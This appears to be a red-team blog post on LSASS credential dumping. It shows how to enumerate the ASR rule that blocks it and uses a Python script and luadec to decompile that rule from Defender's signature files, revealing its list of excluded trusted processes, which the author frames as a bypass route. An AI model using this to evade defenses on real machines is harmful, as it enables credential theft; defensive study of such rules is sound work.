Intro
Recently, I had a conversation about the Local Security Authority Subsystem Service (LSASS) process and its protection mechanisms. This inspired me to dig deeper into the topic and write this post, focusing on LSASS credential dumping and the various Windows protection mechanisms against it.
I will not write a full description of LSASS here, as many articles already cover that. Instead, I’ll focus on the basics and dive straight into the technical details.
In a Windows system, users authenticate to their machines —whether locally or remotely—using a username and password. Behind the scenes, the responsibility for handling all authentication tasks lies with the LSASS. This process, represented by the “lsass.exe”, retains sensitive authentication details in its memory, such as user credentials and password hashes.
With this in mind, we as attackers could focus on extracting data from the LSASS process despite it’s not OPSEC action, but sometimes we are forced to obtain sensitive Windows credentials from lsass.exe. Once these credentials are compromised, they can be leveraged to facilitate lateral movement within the network and perform other malicious activities. This technique, known as credential dumping, is a critical step in the attacker’s kill chain for compromising accounts, passwords, and hashes.
Tools
Most common tools & techniques in order to dump credentials from LSASS:
- mimikatz
- procdump
- taskmgr
- comsvcs.dll
- nanodump
- lsassy
- crackmapexec
- powershell (Out-Minidump.ps1)
- miniDumpWriteDump (API)
- secretsdump.py
Requirements to get dump from LSASS:
You must have an administration session with It is necessary to have SeDebugPrivilege (Required to debug and adjust the memory of a process owned by another account) privilege (must be enabled) to dump LSASS.
By default, SeDebugPrivilege is granted to members of the Administrators group. However, it is not always enabled automatically in their sessions; it needs to be explicitly enabled.
Defense Mechanisms to Prevent LSASS Dumping
In that blog we go deeper in field to bypass Attack Surface Reduction (ASR) rule and successfully get a dump from LSASS.
But it’s important to highlight popular existsing defense mechanisms to prevent LSASS dumping.
- Credential Guard
- Protection Process Light
- Attack Surface Reduction (ASR) Rules
- Endpoint Detection and Response (EDR) and AV tools
Attack Surface Reduction (ASR) Rules
ASR is a collection of hardening configurations designed to mitigate common attack techniques employed by adversaries. ASR rules are implemented using LUA (Lightweight Utility Applications) and are enforced through Windows Defender.
ASR provides an additional layer of defense against cyber threats.
You can find a list of those rules and their GUID here.
Block Credential Stealing from LSASS
Today we will focus and work with
Block credential stealing from the Windows local security authority subsystem (lsass.exe) rule.
GUID:
9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
This rule helps prevent credential stealing, by locking down Local Security Authority Subsystem Service (LSASS).
When we try to dump LSASS Microsoft defender will flag it as malicious because the ASR rule prevents untrusted processes from having direct access to LSASS memory.
And here we are, few questions was risen in my head:
Do trusted processes exist?
Which processes is it?
Could we use it to bypass that rule?
Be patient and keep reading. Back to the main flow.
You can enable attack surface reduction rules by using any of these methods:
- Microsoft Intune
- Mobile Device Management (MDM)
- Microsoft Configuration Manager
- Group Policy
- PowerShell
In my home domain lab environment, I will be implementing Attack Surface Reduction (ASR) through Group Policy.
gpmc.msc > [YOUR DOMAIN] > Default Domain Policy > Edit > Computer Configuration > Policies > Administrative Templates > Windows Components > Windows Defender Antivirus > Windows Defender Exploit Guard > Attack Surface Reduction
In the ‘Value Name’ field, we should insert the GUID of the rule we want to enable, in this case, 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2. In the ‘Value’ field, we should set the value to ‘1’ (Block) to enable the Attack Surface Reduction rule.
Enumeration
ASR rules can be enumerated remotely via GPO, from the local registry of a machine to which they’re applied, or with PowerShell’s Get-MpPreference cmdlet.
GPO
One possible approach is to search Group Policy Objects (GPOs) by name.
For example, this can be done using PowerView. However, in my opinion, leveraging PowerShell is not ideal from an OPSEC perspective, as it is one of the most commonly monitored executable files, has a history file, and so on.
Although I will provide the payload for retrieving information about ASR rules via PowerShell,but in real-world engagements, I prefer to obtain this information by querying registry hives.
PS> Get-DomainGPO -Name "Asr Rule" -Properties GpcFileSysPath
gpcfilesyspath
--------------
\\labtest.net\sysvol\labtest.net\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
>> dir \\labtest.net\sysvol\labtest.net\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine
07/25/2024 04:07 PM <DIR> Applications
12/29/2024 04:43 PM 554 comment.cmtx
04/06/2024 08:45 PM <DIR> Microsoft
12/29/2024 04:43 PM 5,684 Registry.pol
07/24/2024 10:06 PM <DIR> Scripts
#Download Registry.pol and parse it with Parse-Polfile
PS> Parse-PolFile .\Registry.pol
KeyName: Software\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR
ValueName: ExploitGuard_ASR_Rules
ValueType: REG_DWORD
ValueLength: 4
ValueData: 1
KeyName: Software\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules
ValueName: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
ValueType: REG_SZ
ValueLength: 4
ValueData: 1The entry ExploitGuard_ASR_Rules with a ValueData of 1 indicates that ASR rules are enabled.
The output from the ‘Rules’ registry key with the ValueName 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 indicates the ‘Block credential stealing from the Windows Local Security Authority Subsystem (lsass.exe)’ rule is enabled with a ValueData of 1 (Block).
The possible values are:
0 – Disabled; 1 – Block; 2 – Audit; 6 – Warn.
for more info
Registry
In order to obtain information about ASR rules you can also query the local registry:
>> reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules
9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 REG_SZ 1Powershell
PS>> get-mppreference | select-object -expandproperty AttackSurfaceReductionRules_Ids
9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2Validating
As seen in the screenshot, we encounter an error with kuhl_m_sekurlsa_acquireLSA. This error occurs logically because the ASR rule is enabled, and the defense mechanism is functioning as expected.
At this point, we will delve into the Windows Defender flow to further investigate.
Defender’s VDM containers
During this research, I came across several insightful articles about the Defender environment and some undocumented aspects. One of these articles was a remarkable research piece by a researcher named Commial—excellent work indeed.
Based on this research, we can conclude that Windows Defender signatures, rules, and metadata are stored in VDM containers. Many of these files are Lua scripts or Lua bytecodes. By utilizing tools like WDExtract, we can decrypt and extract all the PE images from these containers. Afterward, by analyzing the extracted VDM files, we can identify the whitelisted exclusion paths for ASR rules.
In this case, we are primarily focused on the mpasbase.vdm file, which contains signatures, emulation resources, and other related data. Let’s proceed with decrypting and extracting this information.
First, we need to download the mpasbase.vdm file from our lab’s Windows 10 machine.
The default path is:
C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup
Next, we will use the WDExtract tool to extract the data.
>> wdextract64.exe mpasbase.vdm
ExtractDataDll: Attempt to unpack VDM container
Stats:
Read bytes = 81153976 (79251 KB)
Written bytes = 186127862 (181765 KB)
Bye!
12/30/2024 05:31 AM 186,127,862 mpasbase.vdm.extractedWith the extracted data in hand, the next step is to locate our GUID (9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2) and retrieve the Lua bytecode for further analysis.
To avoid manual routine tasks, I’ve written a small Python script that takes the extracted VDM container (in our case, mpasbase.vdm), searches for the Lua bytecode based on the GUID, and saves it to a file.
fetch_lua.py
#!/usr/bin/python3
import os
import sys
# LSASS GUID 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
FILE = sys.argv[1]
FILE_OUT = 'output.lua'
GUID = sys.argv[2].encode()
result = []
header = b'\x1bLuaQ\x00\x01\x04\x08\x04\x08\x01'
start = 0
if os.path.exists(FILE):
with open(FILE, 'rb') as r:
data = r.read()
while True:
position = data.find(GUID, start)
if position != -1:
result.append(position)
start = position + 1
else:
break
print(f"[+] Have found lua magic bytes on the next positions: {result}")
print("[+] Trying to fetch the Lua bytecode")
if result:
for p in result:
x = (p + len(GUID)) + 1 #1 it's \x00
y = x + len(header)
magic_bytes = data[x:y]
if magic_bytes == header:
print('Have found lua magic bytes, saving the file')
with open(f"{p}_{FILE_OUT}", 'wb') as w:
w.write(data[x:])
print(f'File saved: {f"{p}_{FILE_OUT}"}')Result:
$> ./fetch_lua.py mpasbase.vdm.extracted 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
[+] Have found lua magic bytes on the next positions: [42233616, 44198956, 44206376, 60403275, 61098287, 61109489, 65699075]
[+] Trying to fetch the Lua bytecode
Have found lua magic bytes, saving the file
File saved: 65699075_output.lua
$> file 65699075_output.lua
65699075_output.lua: Lua bytecode, version 5.1Before the main decompiling process we must prepare / convert our current Lua into a version which could deal with Lua Decompiler (LuaDec). We can achieve this with the native Python MpLua converter.
$> ./parse.py 65699075_output.lua final_result.lua
$> file final_result.lua
final_result.lua: Lua bytecode, version 5.1Finally, we can decompile it, resulting in a human-readable output!
The result:
test@ubuntu22:~/luadec/luadec$ ./luadec /tmp/final_result.lua
cannot find blockend > 8 , pc = 7, f->sizecode = 9
cannot find blockend > 9 , pc = 8, f->sizecode = 9
cannot find blockend > 8 , pc = 7, f->sizecode = 9
cannot find blockend > 9 , pc = 8, f->sizecode = 9
cannot find blockend > 5 , pc = 4, f->sizecode = 6
cannot find blockend > 6 , pc = 5, f->sizecode = 6
cannot find blockend > 224 , pc = 223, f->sizecode = 225
cannot find blockend > 225 , pc = 224, f->sizecode = 225
cannot find blockend > 6 , pc = 5, f->sizecode = 7
cannot find blockend > 7 , pc = 6, f->sizecode = 7
-- Decompiled using luadec 2.2 rev: 895d923 for Lua 5.1 from https://github.com/viruscamp/luadec
-- Command line: /tmp/final_result.lua
-- params : ...
-- function num : 0
GetRuleInfo = function()
-- function num : 0_0
local l_1_0 = {}
l_1_0.Name = "Block credential stealing from the Windows local security authority subsystem (lsass.exe)"
l_1_0.Description = "Windows Defender Exploit Guard detected an attempt to extract credentials from LSASS."
l_1_0.NotificationDedupingInterval = 14400
l_1_0.NotificationDedupingScope = HIPS.DEDUPE_SCOPE_ALL
return l_1_0
end
GetMonitoredLocations = function()
-- function num : 0_1
local l_2_0 = {}
l_2_0["%windir%\\system32\\lsass.exe"] = 2
return 7, l_2_0
end
GetPathExclusions = function()
-- function num : 0_2
local l_3_0 = {}
l_3_0["%windir%\\system32\\WerFaultSecure.exe"] = 2
l_3_0["%windir%\\system32\\mrt.exe"] = 2
l_3_0["%windir%\\system32\\svchost.exe"] = 2
l_3_0["%windir%\\system32\\NETSTAT.EXE"] = 2
l_3_0["%windir%\\syswow64\\NETSTAT.EXE"] = 2
l_3_0["%windir%\\system32\\wbem\\WmiPrvSE.exe"] = 2
l_3_0["%windir%\\SysWOW64\\wbem\\WmiPrvSE.exe"] = 2
l_3_0["%windir%\\system32\\DriverStore\\FileRepository\\*\\NVWMI\\nvWmi64.exe"] = 2
l_3_0["%programfiles(x86)%\\Microsoft Intune Management Extension\\ClientHealthEval.exe"] = 2
l_3_0["%programfiles(x86)%\\Microsoft Intune Management Extension\\SensorLogonTask.exe"] = 2
l_3_0["%programfiles(x86)%\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe"] = 2
l_3_0["%programdata%\\Microsoft\\Windows Defender Advanced Threat Protection\\DataCollection\\*\\OpenHandleCollector.exe"] = 2
l_3_0["%programfiles%\\WindowsApps\\Microsoft.GamingServices_*\\gamingservices.exe"] = 2
l_3_0["%programfiles(x86)%\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnagent.exe"] = 2
l_3_0["%programfiles(x86)%\\Zoom\\bin\\CptHost.exe"] = 2
l_3_0["%programfiles(x86)%\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe"] = 2
l_3_0["%programfiles(x86)%\\Microsoft\\Edge\\Application\\*\\Installer\\setup.exe"] = 2
l_3_0["%programfiles(x86)%\\Google\\Update\\GoogleUpdate.exe"] = 2
l_3_0["%programfiles(x86)%\\Splunk\\bin\\splunkd.exe"] = 2
l_3_0["%programfiles(x86)%\\Zscaler\\ZSAUpm\\ZSAUpm.exe"] = 2
l_3_0["%programfiles(x86)%\\Fortinet\\FortiClient\\FortiESNAC.exe"] = 2
l_3_0["%programfiles(x86)%\\FireEye\\xagt\\xagt.exe"] = 2
l_3_0["%programfiles(x86)%\\Autodesk\\Autodesk Desktop App\\AdAppMgrSvc.exe"] = 2
l_3_0["%programfiles(x86)%\\Dropbox\\Update\\DropboxUpdate.exe"] = 2
l_3_0["%programfiles(x86)%\\HP\\HP Touchpoint Analytics Client\\Provider Data Sources\\ProcInfo\\ProcInfo.exe"] = 2
l_3_0["%programfiles(x86)%\\Common Files\\Adobe\\AdobeGCClient\\AGMService.exe"] = 2
l_3_0["%programfiles(x86)%\\Tanium\\Tanium Client\\Tools\\Detect3\\TaniumDetectEngine.exe"] = 2
l_3_0["%programfiles(x86)%\\Airwatch\\AgentUI\\AWProcessCommands.exe"] = 2
l_3_0["%programfiles(x86)%\\Bit9\\Parity Agent\\Parity.exe"] = 2
l_3_0["%programfiles(x86)%\\Arctic Wolf Networks\\Agent\\ossec-agent.exe"] = 2
l_3_0["%programfiles(x86)%\\Cordaware\\Infoband\\Infoclient.exe"] = 2
l_3_0["%programfiles(x86)%\\Splunk\\bin\\splunk-regmon.exe"] = 2
l_3_0["%programfiles(x86)%\\Lenovo\\VantageService\\*\\LenovoVantage-(LenovoBoostSystemAddin).exe"] = 2
l_3_0["%programfiles(x86)%\\Micro Focus\\Discovery Agent\\bin32\\discagnt.exe"] = 2
l_3_0["%programfiles(x86)%\\Hewlett-Packard\\Discovery Agent\\bin32\\discagnt.exe"] = 2
l_3_0["%programfiles(x86)%\\Micro Focus\\Discovery Agent\\Plugins\\usage\\discusge.exe"] = 2
l_3_0["%programfiles(x86)%\\Hewlett-Packard\\Discovery Agent\\Plugins\\usage\\discusge.exe"] = 2
l_3_0["%programfiles(x86)%\\Cisco\\Cisco AnyConnect Secure Mobility Client\\aciseagent.exe"] = 2
l_3_0["%programfiles(x86)%\\BigFix Enterprise\\BES Client\\BESClient.exe"] = 2
l_3_0["%programfiles(x86)%\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe"] = 2
l_3_0["%programfiles(x86)%\\ManageSoft\\Tracker\\ndtrack.exe"] = 2
l_3_0["%programfiles(x86)%\\Aternity Information Systems\\Agent"] = 2
l_3_0["%programfiles(x86)%\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpndownloader.exe"] = 2
l_3_0["%programfiles(x86)%\\Common Files\\Adobe\\ARM\\*\\AdobeARMHelper.exe"] = 2
l_3_0["%programfiles(x86)%\\Common Files\\Adobe\\ARM\\*\\Temp\\*\\AdobeARMHelper.exe"] = 2
l_3_0["%programfiles(x86)%\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrServicesUpdater.exe"] = 2
l_3_0["%programfiles(x86)%\\Aternity Information Systems\\Update\\AternityUpdate.exe"] = 2
l_3_0["%programfiles(x86)%\\Tanium\\Tanium Client\\TaniumClient.exe"] = 2
l_3_0["%programfiles(x86)%\\BraveSoftware\\Update\\BraveUpdate.exe"] = 2
l_3_0["%programfiles(x86)%\\SysTrack\\LsiAgent\\LsiSupervisor\\*\\LsiSupervisor.exe"] = 2
l_3_0["%programfiles(x86)%\\Cisco\\Cisco HostScan\\bin\\ciscod.exe"] = 2
l_3_0["%programfiles(x86)%\\SysTrack\\LsiAgent\\LsiMods64.exe"] = 2
l_3_0["%programfiles(x86)%\\CheckPoint\\Endpoint Connect\\Watchdog\\EPWD.exe"] = 2
l_3_0["%programfiles(x86)%\\CheckPoint\\Endpoint Security\\Endpoint Common\\bin\\cpda.exe"] = 2
l_3_0["%programfiles(x86)%\\VMware\\VMware Tools"] = 2
l_3_0["%programfiles(x86)%\\VMware\\VMware Horizon View Client"] = 2
l_3_0["%programfiles(x86)%\\Common Files\\VMware\\Remote Experience"] = 2
l_3_0["%programfiles(x86)%\\Cisco\\Cisco AnyConnect Secure Mobility Client\\acswgagent.exe"] = 2
l_3_0["%programfiles(x86)%\\N-able Technologies\\Windows Agent\\bin\\agent.exe"] = 2
l_3_0["%programfiles(x86)%\\Digital Arts\\AC\\app\\bin\\acservice.exe"] = 2
l_3_0["%programfiles(x86)%\\MOTEX\\LanScope Cat MR\\Lspcmr.exe"] = 2
l_3_0["%programfiles(x86)%\\Power Automate Desktop\\Microsoft.Flow.RPA.LauncherService.exe"] = 2
l_3_0["%programfiles(x86)%\\DesktopCentral_Agent\\bin\\dcagentservice.exe"] = 2
l_3_0["%programfiles(x86)%\\CheckPoint\\Endpoint Security\\Endpoint Common\\bin\\IDAFServerHostService.exe"] = 2
l_3_0["%programfiles(x86)%\\Arctic Wolf Networks\\Agent\\plugins\\osquery\\osqueryi.exe"] = 2
l_3_0["%programfiles(x86)%\\Btc\\eAudytor\\eAgent\\Bin\\qati.exe"] = 2
l_3_0["%programfiles(x86)%\\Adobe\\Adobe Sync\\CoreSync\\customhook\\CoreSyncCustomHook.exe"] = 2
l_3_0["%programfiles(x86)%\\NetSupport\\NetSupport School"] = 2
l_3_0["%programfiles(x86)%\\UEMS_Agent\\bin\\dcagentservice.exe"] = 2
l_3_0["%programfiles(x86)%\\Google\\Temp\\*\\GoogleUpdate.exe"] = 2
l_3_0["%programfiles(x86)%\\Adobe\\Acrobat DC\\Acrobat\\AcroCEF\\AcroServicesUpdater.exe"] = 2
l_3_0["%programfiles(x86)%\\Ninite Agent\\NiniteAgent.exe"] = 2
l_3_0["%programfiles(x86)%\\HP\\HP Classroom Manager\\Runplugin64.exe"] = 2
l_3_0["%programfiles(x86)%\\SysTrack\\LsiAgent\\LsiAgent.exe"] = 2
l_3_0["%programfiles(x86)%\\VMware\\VMware Player\\vmware-authd.exe"] = 2
l_3_0["%programfiles(x86)%\\Dameware Remote Everywhere Agent\\BASupSysInf.exe"] = 2
l_3_0["%programfiles(x86)%\\Power Automate Desktop\\Microsoft.Flow.RPA.*.exe"] = 2
l_3_0["%programfiles(x86)%\\Common Files\\Adobe\\Adobe Desktop Common\\ElevationManager\\Adobe Installer.exe"] = 2
l_3_0["%programfiles(x86)%\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe"] = 2
l_3_0["%programfiles(x86)%\\SolarWinds"] = 2
l_3_0["%programfiles(x86)%\\checkmk\\service\\check_mk_agent.exe"] = 2
l_3_0["%programfiles(x86)%\\ClassPolicyAgent\\PolicyAgent.exe"] = 2
l_3_0["%programfiles(x86)%\\VMware\\VMware Workstation\\vmware-authd.exe"] = 2
l_3_0["%programfiles(x86)%\\Balbix\\Update\\BalbixUpdate.exe"] = 2
l_3_0["%programfiles(x86)%\\Bradford Networks\\Persistent Agent\\bndaemon.exe"] = 2
l_3_0["%programfiles(x86)%\\Site24x7\\WinAgent\\monitoring\\bin\\MEAgentHelper.exe"] = 2
l_3_0["%programfiles(x86)%\\Site24x7\\WinAgent\\monitoring\\bin\\AppBin\\Site24x7AppAgent.exe"] = 2
l_3_0["%programfiles(x86)%\\Cato Networks\\Cato Client\\winvpnclient.cli.exe"] = 2
l_3_0["%programfiles(x86)%\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe"] = 2
l_3_0["%programfiles(x86)%\\Sky Product\\SKYSEA Client View"] = 2
l_3_0["%programfiles(x86)%\\Tanium\\Tanium Client\\TaniumCX.exe"] = 2
l_3_0["%programfiles(x86)%\\xagt\\xagt.exe"] = 2
l_3_0["%programfiles(x86)%\\Microsoft Azure Site Recovery\\agent\\s2RCM.exe"] = 2
l_3_0["%programfiles(x86)%\\Cisco\\Cisco Secure Client"] = 2
l_3_0["%programfiles(x86)%\\HP\\HP Touchpoint Analytics Client\\TouchpointAnalyticsClientService.exe"] = 2
l_3_0["%programfiles(x86)%\\CyberCNSAgent\\osqueryi.exe"] = 2
l_3_0["%programfiles(x86)%\\FortiMonitorAgent\\bin\\Aggregator.Agent.exe"] = 2
l_3_0["%programfiles(x86)%\\IBM\\Notes\\nsd.exe"] = 2
l_3_0["%programfiles(x86)%\\Riverbed\\Steelhead Mobile\\rbtmon.exe"] = 2
l_3_0["%programfiles%\\Avecto\\Privilege Guard Client\\DefendpointService.exe"] = 2
l_3_0["%programfiles%\\Intel\\SUR\\QUEENCREEK\\x64\\esrv_svc.exe"] = 2
l_3_0["%programfiles%\\Microsoft Monitoring Agent\\Agent\\HealthService.exe"] = 2
l_3_0["%programfiles%\\Microsoft Monitoring Agent\\Agent\\MOMPerfSnapshotHelper.exe"] = 2
l_3_0["%programfiles%\\Nexthink\\Collector\\Collector\\nxtsvc.exe"] = 2
l_3_0["%programfiles%\\Splunk\\bin\\splunkd.exe"] = 2
l_3_0["%programfiles%\\Azure Advanced Threat Protection Sensor\\*\\Microsoft.Tri.Sensor.Updater.exe"] = 2
l_3_0["%programfiles%\\common files\\microsoft shared\\ClickToRun\\Updates\\*\\OfficeClickToRun.exe"] = 2
l_3_0["%programfiles%\\Zscaler\\ZSAUpm\\ZSAUpm.exe"] = 2
l_3_0["%programfiles%\\Fortinet\\FortiClient\\FortiESNAC.exe"] = 2
l_3_0["%programfiles%\\FireEye\\xagt\\xagt.exe"] = 2
l_3_0["%programfiles%\\Autodesk\\Autodesk Desktop App\\AdAppMgrSvc.exe"] = 2
l_3_0["%programfiles%\\Qualys\\QualysAgent\\QualysAgent.exe"] = 2
l_3_0["%programfiles%\\Altiris\\Altiris Agent\\AeXNSAgent.exe"] = 2
l_3_0["%programfiles%\\VMware\\VMware Tools"] = 2
l_3_0["%programfiles%\\VMware\\VMware Horizon View Client"] = 2
l_3_0["%programfiles%\\Common Files\\VMware\\Remote Experience"] = 2
l_3_0["%programfiles%\\Dell\\DTP\\InstrumentationSubAgent\\Dell.TechHub.Instrumentation.SubAgent.exe"] = 2
l_3_0["%programfiles%\\Rapid7\\Insight Agent\\components\\insight_agent\\*\\ir_agent.exe"] = 2
l_3_0["%programfiles%\\Microsoft RDInfra\\RDMonitoringAgent_*\\Agent\\MonAgentCore.exe"] = 2
l_3_0["%programfiles%\\BMCSoftware\\Client Management\\Client\\bin\\mtxagent.exe"] = 2
l_3_0["%programfiles%\\DisplayLink Core Software\\DisplayLinkHotDeskService.exe"] = 2
l_3_0["%programfiles%\\ManageSoft\\Tracker\\ndtrack.exe"] = 2
l_3_0["%programfiles%\\Websense\\Websense Endpoint\\wepsvc.exe"] = 2
l_3_0["%programfiles%\\Ricoh\\Streamline NX\\PC Client\\jre\\bin\\java.exe"] = 2
l_3_0["%programfiles%\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\*\\pmfexe.exe"] = 2
l_3_0["%programfiles%\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe"] = 2
l_3_0["%programfiles%\\AppSense\\Application Manager\\Agent\\AMAgent.exe"] = 2
l_3_0["%programfiles%\\Adobe\\Acrobat DC\\Acrobat\\AcroCEF\\SingleClientServicesUpdater.exe"] = 2
l_3_0["%programfiles%\\osquery\\osqueryd\\osqueryd.exe"] = 2
l_3_0["%programfiles%\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"] = 2
l_3_0["%programfiles%\\CyberArk\\Endpoint Privilege Manager\\Agent\\PASAgent\\PASAgent.exe"] = 2
l_3_0["%programfiles%\\Palo Alto Networks\\GlobalProtect\\PanGPS.exe"] = 2
l_3_0["%programfiles%\\Smart-X\\ControlUpAgent\\Version*\\cuAgent.exe"] = 2
l_3_0["%programfiles%\\Citrix\\*\\XenDesktopRestApiService.exe"] = 2
l_3_0["%programfiles%\\Palo Alto Networks\\DEM\\DEMAgentProcess.exe"] = 2
l_3_0["%programfiles%\\Phantom\\IBSA\\ibsaService.exe"] = 2
l_3_0["%programfiles%\\eGurkha\\lib\\AppPid.exe"] = 2
l_3_0["%programfiles%\\dynatrace\\oneagent\\agent\\lib64\\oneagentos.exe"] = 2
l_3_0["%programfiles%\\dynatrace\\oneagent\\agent\\lib64\\oneagentplugin.exe"] = 2
l_3_0["%programfiles%\\Remote Desktop WebRTC Redirector\\MsRdcWebRTCSvc.exe"] = 2
l_3_0["%programfiles%\\Sophos\\Sophos File Scanner\\SophosFileScanner.exe"] = 2
l_3_0["%programfiles%\\NetSupport\\NetSupport School"] = 2
l_3_0["%programfiles%\\OEM\\AMS\\Service\\ams.exe"] = 2
l_3_0["%programfiles%\\Eracent\\EPM\\epm.exe"] = 2
l_3_0["%programfiles%\\Cybereason ActiveProbe\\minionhost.exe"] = 2
l_3_0["%programfiles%\\Google\\Temp\\*\\GoogleUpdate.exe"] = 2
l_3_0["%programfiles%\\Orbit\\bin\\osqueryd\\windows\\stable\\osqueryd.exe"] = 2
l_3_0["%programfiles%\\1E\\Client\\1E.Client.exe"] = 2
l_3_0["%programfiles%\\Endgame\\esensor.exe"] = 2
l_3_0["%programfiles%\\Microsoft Cloud Managed Desktop Extension\\CMDExtension\\Microsoft.Management.Services.CloudManagedDesktop.Agent.exe"] = 2
l_3_0["%programfiles%\\common files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe"] = 2
l_3_0["%programfiles%\\Adobe\\Adobe Creative Cloud Experience\\libs\\node.exe"] = 2
l_3_0["%programfiles%\\Fortinet\\FortiClient\\FortiProxy.exe"] = 2
l_3_0["%programfiles%\\Guardicore\\gc-launcher.exe"] = 2
l_3_0["%programfiles%\\Microsoft Azure AD Connect Health Sync Agent\\Insights\\Microsoft.Identity.AadConnect.Health.AadSync.Host.exe"] = 2
l_3_0["%programfiles%\\Huntress\\HuntressAgent.exe"] = 2
l_3_0["%programfiles%\\vast limits\\uberAgent\\uberAgent.exe"] = 2
l_3_0["%programfiles%\\Adobe\\Acrobat DC\\Acrobat\\AcroCEF\\AcroServicesUpdater.exe"] = 2
l_3_0["%programfiles%\\Dell\\DellOptimizer\\DellOptimizer.exe"] = 2
l_3_0["%programfiles%\\Manufacturer\\Endpoint Agent\\edpa.exe"] = 2
l_3_0["%programfiles%\\CyberArk\\Endpoint Privilege Manager\\Agent\\vf_agent.exe"] = 2
l_3_0["%programfiles%\\Morphisec\\bin\\ProtectorService64.exe"] = 2
l_3_0["%programfiles%\\Zoom\\bin\\CptHost.exe"] = 2
l_3_0["%programfiles%\\TOLLAD\\GEMONPROC.exe"] = 2
l_3_0["%programfiles%\\SMS_CCM\\CcmExec.exe"] = 2
l_3_0["%programfiles%\\HEAT Software\\EMSSAgent\\*\\lmhost.exe"] = 2
l_3_0["%programfiles%\\Skyhigh\\SCP\\ScpService.exe"] = 2
l_3_0["%programfiles%\\VMware\\VMware View\\*\\bin\\wsnm.exe"] = 2
l_3_0["%programfiles%\\NetClean Technologies\\ProActive\\fsdaemon\\bin\\fsdaemon.exe"] = 2
l_3_0["%programfiles%\\Topaz OFD\\Warsaw\\core.exe"] = 2
l_3_0["%programfiles%\\Microsoft Dependency Agent\\bin\\MicrosoftDependencyAgent.exe"] = 2
l_3_0["%programfiles%\\Autodesk\\AdODIS\\V1\\Setup\\install_helper_tool.exe"] = 2
l_3_0["%programfiles%\\EPSON Projector\\Easy Interactive Driver Ver.??\\EIN_SV.exe"] = 2
l_3_0["%programfiles%\\FortiMonitorAgent\\bin\\Aggregator.Agent.exe"] = 2
l_3_0["C:\\Packages\\Plugins\\Microsoft.Azure.Diagnostics.IaaSDiagnostics\\*\\Monitor\\x64\\MonAgentCore.exe"] = 0
l_3_0["C:\\Packages\\Plugins\\Microsoft.Azure.Security.Monitoring.AzureSecurityWindowsAgent\\*\\Monitoring\\Agent\\Extensions\\AzureSecurityPack\\pmfexe.exe"] = 0
l_3_0["C:\\eGurkha\\lib\\AppPid.exe"] = 0
l_3_0["C:\\blp\\API\\Office Tools"] = 0
l_3_0["C:\\blp\\Wintrv"] = 0
l_3_0["%windir%\\System32\\DriverStore\\FileRepository\\hpanalyticscomp.*\\x64\\Provider Data Sources\\ProcInfo\\ProcInfo.exe"] = 2
l_3_0["%windir%\\system32\\RtkAudUService64.exe"] = 2
l_3_0["%windir%\\system32\\nvwmi64.exe"] = 2
l_3_0["%windir%\\system32\\lpksetup.exe"] = 2
l_3_0["%windir%\\system32\\LogonUI.exe"] = 2
l_3_0["%windir%\\system32\\DriverStore\\FileRepository\\hpcustomcapcomp.inf_amd64_*\\x64\\AppHelperCap.exe"] = 2
l_3_0["%windir%\\system32\\IntelBroadbandManagerSvc.exe"] = 2
l_3_0["%windir%\\AdminArsenal\\PDQInventory-Scanner\\service-1\\PDQInventory-Scanner-1.exe"] = 2
l_3_0["%windir%\\RtkBtManServ.exe"] = 2
l_3_0["%windir%\\CarbonBlack\\cb.exe"] = 2
l_3_0["%windir%\\LTSvc\\LTSVC.exe"] = 2
l_3_0["%windir%\\CCM\\CcmExec.exe"] = 2
l_3_0["%windir%\\CCM\\SensorLogonTask.exe"] = 2
l_3_0["%windir%\\CCM\\SleepAgentService.exe"] = 2
l_3_0["%windir%\\Sysmon64.exe"] = 2
l_3_0["%windir%\\sysmon.exe"] = 2
l_3_0["%windir%\\SysWOW64\\CCM\\CcmExec.exe"] = 2
l_3_0["%windir%\\Downloaded Program Files\\f5epi.exe"] = 2
l_3_0["%windir%\\Temp\\Ctx-*\\Extract\\TrolleyExpress.exe"] = 2
l_3_0["%programdata%\\Citrix\\Citrix Receiver*\\TrolleyExpress.exe"] = 2
l_3_0["%programdata%\\Citrix\\Citrix Workspace *\\TrolleyExpress.exe"] = 2
l_3_0["%programdata%\\App-V\\*\\*\\Root\\VFS\\Windows\\CCM\\CcmExec.exe"] = 2
l_3_0["%programfiles(x86)%\\Citrix\\Citrix Workspace *\\TrolleyExpress.exe"] = 2
l_3_0["%temp%\\Ctx-*\\Extract\\TrolleyExpress.exe"] = 1
l_3_0["%programfiles%\\Quest\\ChangeAuditor\\Agent\\NPSrvHost.exe"] = 2
l_3_0["%programfiles%\\Quest\\ChangeAuditor\\Service\\ChangeAuditor.Service.exe"] = 2
l_3_0["%programdata%\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseNDR\\NdrSetup.exe"] = 2
